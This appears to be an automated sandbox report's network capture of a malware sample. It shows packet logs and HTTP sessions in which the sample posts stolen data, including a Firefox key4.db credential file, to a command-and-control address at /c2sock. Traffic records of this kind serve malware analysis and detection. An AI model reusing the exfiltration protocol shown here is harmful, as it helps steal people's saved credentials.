                                                          Nov 13, 2024 10:55:32.727252007 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:32.727317095 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:32.779860020 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:32.779956102 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:32.831512928 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:32.831568956 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:32.877703905 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:32.877912045 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:32.925664902 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:32.925895929 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:32.973731995 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:32.973881006 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.025834084 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.025959015 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.073640108 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.073723078 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.125726938 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.125866890 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.177659988 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.177864075 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.229772091 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.229834080 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.277539015 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.277640104 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.325716019 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.325840950 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.377692938 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.377839088 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.425700903 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.425802946 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.473565102 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.473683119 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.521584034 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.521688938 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.569468021 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.569538116 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.617480040 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.617558002 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.665680885 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.665783882 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.713581085 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.713772058 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.765682936 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.765811920 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.813715935 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:33.813889980 CET4998180192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:33.853785992 CET804998194.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:34.148191929 CET4998280192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:34.153811932 CET804998294.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:34.153888941 CET4998280192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:34.154098034 CET4998280192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:34.154546976 CET4998280192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:34.160749912 CET804998294.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:34.160764933 CET804998294.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:42.661518097 CET804998294.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:42.661653042 CET4998280192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:42.661700964 CET4998280192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:42.666802883 CET804998294.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:42.933877945 CET4998380192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:42.941041946 CET804998394.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:42.941149950 CET4998380192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:42.941271067 CET4998380192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:42.941651106 CET4998380192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:42.949356079 CET804998394.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:42.949537039 CET804998394.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:51.436189890 CET804998394.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:51.436285019 CET4998380192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:51.446734905 CET4998380192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:51.451777935 CET804998394.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:52.083756924 CET4998480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:52.091015100 CET804998494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:52.091130972 CET4998480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:52.091308117 CET4998480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:52.091700077 CET4998480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:55:52.099524975 CET804998494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:55:52.099960089 CET804998494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:00.595141888 CET804998494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:00.595324039 CET4998480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:00.595391989 CET4998480192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:00.600456953 CET804998494.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:00.870543957 CET4998580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:00.877461910 CET804998594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:00.877629042 CET4998580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:00.877804995 CET4998580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:00.878206968 CET4998580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:00.883586884 CET804998594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:00.883939028 CET804998594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:09.360930920 CET804998594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:09.361496925 CET4998580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:09.361496925 CET4998580192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:09.366497040 CET804998594.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:09.627111912 CET4998680192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:09.633503914 CET804998694.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:09.633634090 CET4998680192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:09.633724928 CET4998680192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:09.634155989 CET4998680192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:09.641968966 CET804998694.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:09.642447948 CET804998694.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:18.125536919 CET804998694.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:18.125633955 CET4998680192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:18.125732899 CET4998680192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:18.130495071 CET804998694.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:18.426907063 CET4998780192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:18.432296991 CET804998794.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:18.432435989 CET4998780192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:18.432607889 CET4998780192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:18.433078051 CET4998780192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:18.438229084 CET804998794.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:18.438643932 CET804998794.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:26.916234016 CET804998794.158.244.69192.168.2.10
                                                          Nov 13, 2024 10:56:26.916301966 CET4998780192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:26.916368961 CET4998780192.168.2.1094.158.244.69
                                                          Nov 13, 2024 10:56:26.921273947 CET804998794.158.244.69192.168.2.10
                                                          • 94.158.244.69
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.104979994.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:54:21.687001944 CET190OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 16798
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:54:21.691559076 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                          Nov 13, 2024 10:54:21.691967010 CET1236OUTData Raw: 4a 12 0d 77 51 a5 18 7e fa 16 9b b0 be 2f fc 1f 69 3d 38 23 4a b3 b3 99 83 62 c4 58 54 bc e5 3a 98 95 e2 43 cf c5 1a 92 51 19 79 8c 99 04 a4 16 6d da ee bc 66 33 6b 88 2f ce 7c 7e 3f 3c eb f9 13 b9 bf 0d 89 18 84 dd 34 23 49 14 0a ad ed 6f 8b d2
                                                          Data Ascii: JwQ~/i=8#JbXT:CQymf3k/|~?<4#Io\gj>7;,)emVW^*|(MLd^1EsDHi)8;@IAMQhpZS`hA4SjuF-~~
                                                          Nov 13, 2024 10:54:21.696624041 CET2472OUTData Raw: 90 3e b0 ff 07 00 00 00 d2 07 f6 ff 00 00 00 40 fa c0 fe 1f 00 00 00 48 1f 58 ff 01 00 00 80 f4 81 f5 1f 00 00 00 48 1f f8 fd 1f 00 00 00 48 1f f9 81 b7 84 5c 56 13 c4 bf cb fd 77 6e 21 ab f5 ff c5 40 4d 00 00 7c 53 1c cc 7f 28 4a 4f 9e 64 5e 6c
                                                          Data Ascii: >@HXHH\Vwn!@M|S(JOd^lzJmQjs>FZuj)"MO<&kw Juyayu4"&5*,Ii*4up1i(Iz.KqR~aJNIUZ)L*k{dKQLlW')ZXN
                                                          Nov 13, 2024 10:54:21.696727037 CET1966OUTData Raw: 7f 7d c9 3c 7b 3b 7a 7a cc 30 d0 54 5c b8 ad f9 ba f0 d7 64 e1 d7 cf 10 ce f9 b9 a1 9f 9b a9 79 df c0 14 f1 e2 f0 a1 1b 9a d6 f3 d1 13 96 8f 0f 1f d8 5a f6 e5 c9 3b 03 37 8f b5 de 6b 98 1d 5f 7a 5d 77 bb 60 df cd de 9d a6 1f 3f ac b2 5e 98 bb bb
                                                          Data Ascii: }<{;zz0T\dyZ;7k_z]w`?^t3sc"hcN#+V;x+b95<\[-Wsv`#Tl0KEE6*Ybm`mn?Cv}yw/|0q*zV5w


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.104985494.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:54:31.163049936 CET190OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 19006
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:54:31.163846016 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                          Nov 13, 2024 10:54:31.168071032 CET1236OUTData Raw: 1f 7e 1c 75 6d 68 cc 3d 9b f4 82 22 c1 20 b1 89 9b 06 bb b4 28 32 49 a1 bb d2 18 0a e4 ee 94 1c 65 42 43 30 1a 77 be e6 db 83 f5 b3 5c eb fc f9 ea be 35 1c 6f 68 bc 0b a9 26 cc d0 3c db dd 75 0f 05 ac e6 47 99 d9 68 e8 2c b9 d3 8d 0a fa cd c4 b2
                                                          Data Ascii: ~umh=" (2IeBC0w\5oh&<uGh,G{=C?<2At{i_ruG:LB^Xq-A6u>$~NB9&F\(n}v;iqQT2Xk]P%SEXIbJ!b2eQ?>(G
                                                          Nov 13, 2024 10:54:31.168920040 CET2472OUTData Raw: 92 20 3c b8 60 76 00 0d 13 f8 c1 11 6e 9c a3 18 b4 1d 8e 8b 7b 10 73 f6 6c e6 e1 79 e8 55 f5 28 3f d0 47 b5 75 fb 8e da 68 6d 5f 2e 6b 22 e6 ea 3a 48 a1 ad 63 2f 99 ed bb e5 71 6f 3c 36 14 ae 75 f9 f2 81 17 e3 72 c9 f2 18 2b d7 94 e5 72 73 1b 35
                                                          Data Ascii: <`vn{slyU(?Guhm_.k":Hc/qo<6ur+rs5%XQ/Y_bEe0'e"iC\G;`Y~HR:3-/lcird.\R[#$G AY<p Ad? ,GAt0J
                                                          Nov 13, 2024 10:54:31.168946028 CET4174OUTData Raw: 69 82 ea 5a aa 60 ca c4 11 2c 53 32 88 e8 c8 ba e7 bb db 9e eb ed 85 e7 82 30 a5 31 71 d3 60 97 3a 71 b4 43 e3 e4 9c 1b 75 2b fb 95 eb 93 08 fe ca 30 86 17 f8 6b 57 d7 ae de db f8 da ad 87 24 a6 b2 b8 2a 49 ba a5 6b a2 a4 4a 4a ef a9 e6 96 d5 ac
                                                          Data Ascii: iZ`,S201q`:qCu+0kW$*IkJJYS,/%Uj\oqDQkY`.HCWQBz%!C_PVuRUTk}e-pwc&4Q$(;,5t|]0%DEWdU


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.104990594.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:54:40.271759987 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:54:40.272409916 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.104995194.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:54:49.314127922 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:54:49.314604998 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.104997894.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:54:58.286600113 CET188OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 440
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:54:58.286981106 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.104997994.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:55:07.287374973 CET190OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 20371
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:55:07.287792921 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;
                                                          Nov 13, 2024 10:55:07.292486906 CET1236OUTData Raw: 2e 1f 79 e7 0d a0 e3 1e d6 6c 65 78 f8 b1 77 64 86 4e 6c 5f ef 6c eb 1c 59 eb 44 eb 4c b9 63 21 75 5b 76 68 ff ce ce fd 63 31 eb 42 29 5a e6 d6 f6 d8 3d eb f6 35 17 72 8f 9a ed 8b 79 45 76 7e 4b f3 b5 59 6a 78 21 75 eb fa a3 98 aa 56 66 bb 67 dd
                                                          Data Ascii: .ylexwdNl_lYDLc!u[vhc1B)Z=5ryEv~KYjx!uVfgvQ,18^%;txgB+jN:CYYxs~nn~z#5gkBII_YuApnc'}?8W}t~o0;sg>@$-|iyV>hj+6ZQ
                                                          Nov 13, 2024 10:55:07.292725086 CET2472OUTData Raw: 4c db 3e 59 ac 9d ab 57 e6 ee 8b b3 6a 95 46 75 a2 f8 e8 99 4a e5 dc 6c a1 7a ae b6 bd 5e a9 cc 9c 29 54 9b 99 13 85 d9 b9 42 69 ba fc 68 b9 78 71 7b a3 56 ac d6 5a c9 95 72 bd 58 ae 3f ba 7d 7a a6 72 a6 30 b3 fa 30 8e ef 39 30 33 52 7b f0 b9 e2
                                                          Data Ascii: L>YWjFuJlz^)TBihxq{VZrX?}zr00903R{SgSw'3zqN>W>[npivr[o?<`d4-:Z<wfDVy8rm{<cpZM}K7Y*
                                                          Nov 13, 2024 10:55:07.292793989 CET2472OUTData Raw: fe 46 f8 af c2 7f 1c fe 62 18 86 d5 28 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe 5f d9 90 ca 24 82 4c e6 f5 db 2e 3d 1e 6c 58 8a 5c 7c e3 73 37 75 46 06 3a 23 b9 ce 48 7f 67 24 bb 14 b9 f0
                                                          Data Ascii: Fb(_$L.=lX\|s7uF:#Hg$GYj_g$IuF72vd ^;/wgW_?Yc*/=qhC02~Pc'WN?}q{KS('<
                                                          Nov 13, 2024 10:55:07.292809963 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Nov 13, 2024 10:55:07.292850018 CET595OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: PKK)PPK&mY&0Mozilla Firefox/091tobv5.default-release/key4.dbPK
                                                          Nov 13, 2024 10:55:07.319921970 CET1236OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii:


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.104998094.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:55:16.232650995 CET189OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 1135
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:55:16.233179092 CET1135OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.104998194.158.244.69807276C:\Users\user\Desktop\I5jG2Os8GA.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 13, 2024 10:55:25.363781929 CET191OUTPOST /c2sock HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                          User-Agent: TeslaBrowser/5.5
                                                          Content-Length: 612692
                                                          Host: 94.158.244.69
                                                          Nov 13, 2024 10:55:25.364300966 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                          Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;
                                                          Nov 13, 2024 10:55:25.368814945 CET1236OUTData Raw: bb de 32 cd f8 5f a5 60 9d a0 cd 01 f3 d6 f9 35 ea 7f f9 93 e8 65 a9 e7 57 a3 fd bd 86 07 9a d6 17 9e 6b a9 dd 1b 61 f3 b3 c2 de 57 4d 79 6f bb a6 da 44 8f 71 70 df e1 96 7e e2 a0 0e 50 ce fb d5 fd bf c6 fc 8f f7 ff 59 69 2a 0b ae 6d 6d 16 fe b3
                                                          Data Ascii: 2_`5eWkaWMyoDqp~PYi*mm<>k\.>WU;dv{kO55)s4rEsyK;jb[q$]Xi,TcyJ$}Ey2T+sV-rf-5/Q-W9+/Z
                                                          Nov 13, 2024 10:55:25.369503975 CET2472OUTData Raw: da f0 82 48 e3 83 fd d1 ff 6c 36 18 ba e0 76 83 52 43 ef b3 ed a3 ff c9 24 d9 9f b9 2f 77 fd df e8 21 61 bd 9f b4 bf 30 c2 fd cc 68 03 0c cc 8f de 37 65 eb 21 fa 15 d1 36 88 fd 38 0e e3 13 e1 7e 33 3c 3e 11 f5 84 88 61 7f a6 ff 99 f6 67 3a 20 0c
                                                          Data Ascii: Hl6vRC$/w!a0h7e!68~3<>ag: ~2p>FJ~A}:mu?!uu[3<x2YJ~fKzcBiE:k]_9s_iE:IIy
                                                          Nov 13, 2024 10:55:25.369528055 CET2472OUTData Raw: 3e 5f d6 ef d1 ff e0 7b dc 4f eb a3 ef e1 75 ca e6 c3 43 ff 93 66 48 f3 a3 01 d2 ff e0 78 b2 0f 58 9a a0 6d 9f ac 0d 34 fd 0f fb f4 79 41 4d 1f eb fa a4 e1 e1 98 d9 ef 2b fd ce ec ff 85 e7 99 73 7e b9 3e a0 5c 03 50 a6 97 ac af 93 fe 47 03 34 6b
                                                          Data Ascii: >_{OuCfHxXm4yAM+s~>\PG4k,nw<9s?9s?_Uk/{,I[bA|Lf= ^a|f\&6Mby~8\3-{O crC
                                                          Nov 13, 2024 10:55:25.369641066 CET2472OUTData Raw: 4b 03 7e 57 e4 7b 39 ff eb 5d ff 73 fd bf ce ff fa 7b ff 6f b7 f8 9f cd 01 db e5 7f 11 fb eb 31 ff 73 fd bf ce ff 7a c1 ff 10 e7 7f e5 f6 ff 3a ff 73 fd bf 9d f2 3f 5b dd 5f 27 fd 2f ad 1f 38 6e 80 83 62 b6 47 fb cb e3 7f 66 fd 5f 6c f6 87 e1 7a
                                                          Data Ascii: K~W{9]s{o1sz:s?[_'/8nbGf_lzI'i<n!4@s>p==D lqJVhk'9CkqnQUG3m|gWIKyGsAzc3N`_)W|Au
                                                          Nov 13, 2024 10:55:25.369656086 CET2472OUTData Raw: ed fd db e7 d2 64 03 7c d9 fb 37 f7 e3 de bf a9 66 8c f3 83 f7 d8 87 63 b3 ff 56 37 2c fa 15 93 77 1f 83 7b bd 2b ee 69 86 4e 86 dc 3e ce 0f ef c7 fd 32 d8 ff b8 f7 6c 2f 7b cf f6 ae f1 59 af 0f ee 21 bd 8d cf 29 9f d5 f6 cc 59 fe 97 f4 f3 92 fb
